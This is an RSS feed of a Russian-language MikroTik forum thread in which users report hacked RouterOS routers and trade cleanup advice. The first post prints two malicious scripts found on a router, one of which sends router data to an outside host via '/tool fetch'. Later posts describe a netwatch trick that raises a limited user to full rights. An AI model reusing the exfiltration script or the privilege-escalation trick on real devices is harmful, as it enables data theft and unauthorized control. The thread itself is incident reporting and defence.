<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0">
	<channel>
		<title>Mikrotik.moscow [тема: Возможное нарушение безопасности]</title>
		<link>http://mikrotik.moscow</link>
		<description>Новое в теме Возможное нарушение безопасности форума RouterOS на сайте Mikrotik.moscow [mikrotik.moscow]</description>
		<language>ru</language>
		<docs>http://backend.userland.com/rss2</docs>
		<pubDate>Thu, 16 Jul 2026 02:24:40 -0400</pubDate>
		<item>
			<title>Возможное нарушение безопасности</title>
			<description><![CDATA[<b><a href="http://mikrotik.moscow/forum/forum57/84655-vozmozhnoe-narushenie-bezopasnosti/message388815">Возможное нарушение безопасности</a></b> <i>RouterOS</i> в форуме <a href="http://mikrotik.moscow/forum/forum57/">RouterOS</a>. <br />
			Ладно, мне следовало пожаловаться в поддержку на эту «функцию». Я думал, что достаточно упомянуть об этом здесь, чтобы всё исправили. <br />
			<i>24.02.2018 07:22:00, jabberd.</i>]]></description>
			<link>http://mikrotik.moscow/forum/forum57/84655-vozmozhnoe-narushenie-bezopasnosti/message388815</link>
			<guid>http://mikrotik.moscow/forum/forum57/84655-vozmozhnoe-narushenie-bezopasnosti/message388815</guid>
			<pubDate>Sat, 24 Feb 2018 07:22:00 -0500</pubDate>
			<category>RouterOS</category>
		</item>
		<item>
			<title>Возможное нарушение безопасности</title>
			<description><![CDATA[<b><a href="http://mikrotik.moscow/forum/forum57/84655-vozmozhnoe-narushenie-bezopasnosti/message388814">Возможное нарушение безопасности</a></b> <i>RouterOS</i> в форуме <a href="http://mikrotik.moscow/forum/forum57/">RouterOS</a>. <br />
			Ок, спасибо за предупреждение. После того как я это опубликовал, заметил ещё несколько скриптов и разных штук в моём роутере, которые пришлось удалить. Поскольку этот Mikrotik используется как DMZ между интернетом и моим фаерволом, я думал, что всё нормально и можно не заморачиваться с перенастройкой. Но, думаю, ты прав — всё же стоит сделать полную очистку. Ещё раз спасибо! <br />
			<i>30.07.2019 03:16:00, JJT211.</i>]]></description>
			<link>http://mikrotik.moscow/forum/forum57/84655-vozmozhnoe-narushenie-bezopasnosti/message388814</link>
			<guid>http://mikrotik.moscow/forum/forum57/84655-vozmozhnoe-narushenie-bezopasnosti/message388814</guid>
			<pubDate>Tue, 30 Jul 2019 03:16:00 -0400</pubDate>
			<category>RouterOS</category>
		</item>
		<item>
			<title>Возможное нарушение безопасности</title>
			<description><![CDATA[<b><a href="http://mikrotik.moscow/forum/forum57/84655-vozmozhnoe-narushenie-bezopasnosti/message388813">Возможное нарушение безопасности</a></b> <i>RouterOS</i> в форуме <a href="http://mikrotik.moscow/forum/forum57/">RouterOS</a>. <br />
			Как уже обсуждалось в других темах, самое безопасное, что можно сделать, если заметил, что роутер был взломан, — это экспортировать конфигурацию (ASCII-часть с помощью команды /export), проверить конфиг на наличие чего-то подозрительного, затем сделать netinstall роутера (это единственный способ, который действительно всё полностью очищает), начать с заводских настроек (у SOHO роутеров довольно разумные настройки фильтрации по умолчанию) и менять только то, что явно необходимо. <br />
			<i>29.07.2019 14:35:00, mkx.</i>]]></description>
			<link>http://mikrotik.moscow/forum/forum57/84655-vozmozhnoe-narushenie-bezopasnosti/message388813</link>
			<guid>http://mikrotik.moscow/forum/forum57/84655-vozmozhnoe-narushenie-bezopasnosti/message388813</guid>
			<pubDate>Mon, 29 Jul 2019 14:35:00 -0400</pubDate>
			<category>RouterOS</category>
		</item>
		<item>
			<title>Возможное нарушение безопасности</title>
			<description><![CDATA[<b><a href="http://mikrotik.moscow/forum/forum57/84655-vozmozhnoe-narushenie-bezopasnosti/message388812">Возможное нарушение безопасности</a></b> <i>RouterOS</i> в форуме <a href="http://mikrotik.moscow/forum/forum57/">RouterOS</a>. <br />
			Старое обсуждение, знаю, но думаю, стоит поднять. Со мной случилось то же самое. В моём расписании было 2 скучных скрипта. Мой роутер был около нескольких минут открыт в WAN с дефолтным именем пользователя, но я заметил скрипт только через несколько дней. Удалил скрипты, администратора, нового пользователя роутера, которого создали, и поменял пароль. Будьте осторожны. Спасибо за пост. <br />
			<i>28.07.2019 17:52:00, JJT211.</i>]]></description>
			<link>http://mikrotik.moscow/forum/forum57/84655-vozmozhnoe-narushenie-bezopasnosti/message388812</link>
			<guid>http://mikrotik.moscow/forum/forum57/84655-vozmozhnoe-narushenie-bezopasnosti/message388812</guid>
			<pubDate>Sun, 28 Jul 2019 17:52:00 -0400</pubDate>
			<category>RouterOS</category>
		</item>
		<item>
			<title>Возможное нарушение безопасности</title>
			<description><![CDATA[<b><a href="http://mikrotik.moscow/forum/forum57/84655-vozmozhnoe-narushenie-bezopasnosti/message388811">Возможное нарушение безопасности</a></b> <i>RouterOS</i> в форуме <a href="http://mikrotik.moscow/forum/forum57/">RouterOS</a>. <br />
			Привет! Сегодня мы столкнулись с точно такой же проблемой на роутере с версией 6.43.2 (но на нем не было правил файрвола в течение часа). Ты знаешь, можно ли ещё как-то использовать «фишку netwatch», чтобы восстановить права администратора? Мы можем войти как admin, но есть пользователь “router” с полными правами, и мы не знаем его пароль. Роутер находится в удалённом месте, так что ехать туда, чтобы это исправить, было бы большой проблемой. Спасибо! <img class="lazyload "  src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" data-src="/upload/forum/mikrotik/ca150d51107d885118e5f330652b64196a576d06.png" alt="Пользователь добавил изображение" border="0" /> <br />
			<i>22.10.2018 08:47:00, punkaker.</i>]]></description>
			<link>http://mikrotik.moscow/forum/forum57/84655-vozmozhnoe-narushenie-bezopasnosti/message388811</link>
			<guid>http://mikrotik.moscow/forum/forum57/84655-vozmozhnoe-narushenie-bezopasnosti/message388811</guid>
			<pubDate>Mon, 22 Oct 2018 08:47:00 -0400</pubDate>
			<category>RouterOS</category>
		</item>
		<item>
			<title>Возможное нарушение безопасности</title>
			<description><![CDATA[<b><a href="http://mikrotik.moscow/forum/forum57/84655-vozmozhnoe-narushenie-bezopasnosti/message388810">Возможное нарушение безопасности</a></b> <i>RouterOS</i> в форуме <a href="http://mikrotik.moscow/forum/forum57/">RouterOS</a>. <br />
			Да, мы уже занимаемся этим. С другой стороны, этому человеку всё ещё нужен существующий пользователь с правами «записи». <br />
			<i>20.02.2018 07:13:00, normis.</i>]]></description>
			<link>http://mikrotik.moscow/forum/forum57/84655-vozmozhnoe-narushenie-bezopasnosti/message388810</link>
			<guid>http://mikrotik.moscow/forum/forum57/84655-vozmozhnoe-narushenie-bezopasnosti/message388810</guid>
			<pubDate>Tue, 20 Feb 2018 07:13:00 -0500</pubDate>
			<category>RouterOS</category>
		</item>
		<item>
			<title>Возможное нарушение безопасности</title>
			<description><![CDATA[<b><a href="http://mikrotik.moscow/forum/forum57/84655-vozmozhnoe-narushenie-bezopasnosti/message388809">Возможное нарушение безопасности</a></b> <i>RouterOS</i> в форуме <a href="http://mikrotik.moscow/forum/forum57/">RouterOS</a>. <br />
			Привет! Но если посмотреть с другой стороны, этот трюк с netwach — своего рода эксплойт. Если у какого-то техника есть ограниченные права в группе, к которой он принадлежит, он может повысить уровень доступа группы до полного. Отправлено с моего XT1580 с помощью Tapatalk <br />
			<i>20.02.2018 03:51:00, raffav.</i>]]></description>
			<link>http://mikrotik.moscow/forum/forum57/84655-vozmozhnoe-narushenie-bezopasnosti/message388809</link>
			<guid>http://mikrotik.moscow/forum/forum57/84655-vozmozhnoe-narushenie-bezopasnosti/message388809</guid>
			<pubDate>Tue, 20 Feb 2018 03:51:00 -0500</pubDate>
			<category>RouterOS</category>
		</item>
		<item>
			<title>Возможное нарушение безопасности</title>
			<description><![CDATA[<b><a href="http://mikrotik.moscow/forum/forum57/84655-vozmozhnoe-narushenie-bezopasnosti/message388808">Возможное нарушение безопасности</a></b> <i>RouterOS</i> в форуме <a href="http://mikrotik.moscow/forum/forum57/">RouterOS</a>. <br />
			Если у вас есть пользователь «router» с полными правами, а у пользователя «admin» установлена группа «admin» с ограниченным набором привилегий (ssh, telnet, policy отключены), вы можете попробовать войти под admin и добавить правило netwatch up для 127.0.0.1 с помощью чего-то вроде этого: /user set admin group=full Тогда не будет необходимости сбрасывать настройки. <br />
			<i>22.03.2017 11:39:00, jabberd.</i>]]></description>
			<link>http://mikrotik.moscow/forum/forum57/84655-vozmozhnoe-narushenie-bezopasnosti/message388808</link>
			<guid>http://mikrotik.moscow/forum/forum57/84655-vozmozhnoe-narushenie-bezopasnosti/message388808</guid>
			<pubDate>Wed, 22 Mar 2017 11:39:00 -0400</pubDate>
			<category>RouterOS</category>
		</item>
		<item>
			<title>Возможное нарушение безопасности</title>
			<description><![CDATA[<b><a href="http://mikrotik.moscow/forum/forum57/84655-vozmozhnoe-narushenie-bezopasnosti/message388807">Возможное нарушение безопасности</a></b> <i>RouterOS</i> в форуме <a href="http://mikrotik.moscow/forum/forum57/">RouterOS</a>. <br />
			Также проверьте файрвол, у вас должна быть правило по умолчанию «запретить» для входящих соединений на WAN. Подумайте о том, чтобы не разрешать доступ к админке роутера из WAN. Не оставляйте стандартный пароль администратора пустым, вредоносные программы внутри сети могут войти в роутер и настроить всё, что захотят. <br />
			<i>22.03.2017 01:57:00, Van9018.</i>]]></description>
			<link>http://mikrotik.moscow/forum/forum57/84655-vozmozhnoe-narushenie-bezopasnosti/message388807</link>
			<guid>http://mikrotik.moscow/forum/forum57/84655-vozmozhnoe-narushenie-bezopasnosti/message388807</guid>
			<pubDate>Wed, 22 Mar 2017 01:57:00 -0400</pubDate>
			<category>RouterOS</category>
		</item>
		<item>
			<title>Возможное нарушение безопасности</title>
			<description><![CDATA[<b><a href="http://mikrotik.moscow/forum/forum57/84655-vozmozhnoe-narushenie-bezopasnosti/message388806">Возможное нарушение безопасности</a></b> <i>RouterOS</i> в форуме <a href="http://mikrotik.moscow/forum/forum57/">RouterOS</a>. <br />
			Я раньше видел такое на некоторых устройствах: там был пользователь «router» с полными правами (пароль неизвестен), а также «admin» с только что созданной группой «admin» с ограниченными привилегиями. <br />
			<i>21.03.2017 23:10:00, jabberd.</i>]]></description>
			<link>http://mikrotik.moscow/forum/forum57/84655-vozmozhnoe-narushenie-bezopasnosti/message388806</link>
			<guid>http://mikrotik.moscow/forum/forum57/84655-vozmozhnoe-narushenie-bezopasnosti/message388806</guid>
			<pubDate>Tue, 21 Mar 2017 23:10:00 -0400</pubDate>
			<category>RouterOS</category>
		</item>
		<item>
			<title>Возможное нарушение безопасности</title>
			<description><![CDATA[<b><a href="http://mikrotik.moscow/forum/forum57/84655-vozmozhnoe-narushenie-bezopasnosti/message388805">Возможное нарушение безопасности</a></b> <i>RouterOS</i> в форуме <a href="http://mikrotik.moscow/forum/forum57/">RouterOS</a>. <br />
			Спасибо, Jabberd, за твою строчку Netwatch — она позволила мне, как администратору, заставить мой роутер работать с New Terminal и SSH логином, с которых меня выбросило. Я всего пару минут оставил роутер с пустым паролем на WAN, и его сразу взломали — поражён, как быстро это произошло. <br />
			<i>15.02.2018 23:34:00, dudleyrees.</i>]]></description>
			<link>http://mikrotik.moscow/forum/forum57/84655-vozmozhnoe-narushenie-bezopasnosti/message388805</link>
			<guid>http://mikrotik.moscow/forum/forum57/84655-vozmozhnoe-narushenie-bezopasnosti/message388805</guid>
			<pubDate>Thu, 15 Feb 2018 23:34:00 -0500</pubDate>
			<category>RouterOS</category>
		</item>
		<item>
			<title>Возможное нарушение безопасности</title>
			<description><![CDATA[<b><a href="http://mikrotik.moscow/forum/forum57/84655-vozmozhnoe-narushenie-bezopasnosti/message388804">Возможное нарушение безопасности</a></b> <i>RouterOS</i> в форуме <a href="http://mikrotik.moscow/forum/forum57/">RouterOS</a>. <br />
			Я обнаружил два подозрительных скрипта на своем роутере Mikrotik после установки версии 6.39rc41. Скрипты принадлежали администратору (конечно же, были отключены). <br /><br />Первый собирает список файлов: &nbsp;<br />ptty-r :delay 100s &nbsp;<br />/file print file=rmip.txt &nbsp;<br />/file set rmip.txt contents="yes" &nbsp;<br />/system script run ptty &nbsp;<br /><br />Второй отправляет данные на веб-страницу: &nbsp;<br />ptty :delay 100s &nbsp;<br />:global myip [/file get mip.txt contents]  <br />:global rmyip [/file get rmip.txt contents]  <br />:global ctryip [/file get ctryip.txt contents]  <br />/tool fetch url="http://createpage.myserv.ignorelist.com/.../metaR-srv.php?ip=$myip&reboot=$rmyip&ctry=$ctryip" mode=http keep-result=no &nbsp;<br /><br />Есть какие-то рекомендации? Вы уже с таким сталкивались? Может, стоит провести какие-то дополнительные проверки, чтобы понять, что именно было изменено? Спасибо! <br />
			<i>04.03.2017 09:33:00, JacquesL.</i>]]></description>
			<link>http://mikrotik.moscow/forum/forum57/84655-vozmozhnoe-narushenie-bezopasnosti/message388804</link>
			<guid>http://mikrotik.moscow/forum/forum57/84655-vozmozhnoe-narushenie-bezopasnosti/message388804</guid>
			<pubDate>Sat, 04 Mar 2017 09:33:00 -0500</pubDate>
			<category>RouterOS</category>
		</item>
	</channel>
</rss>
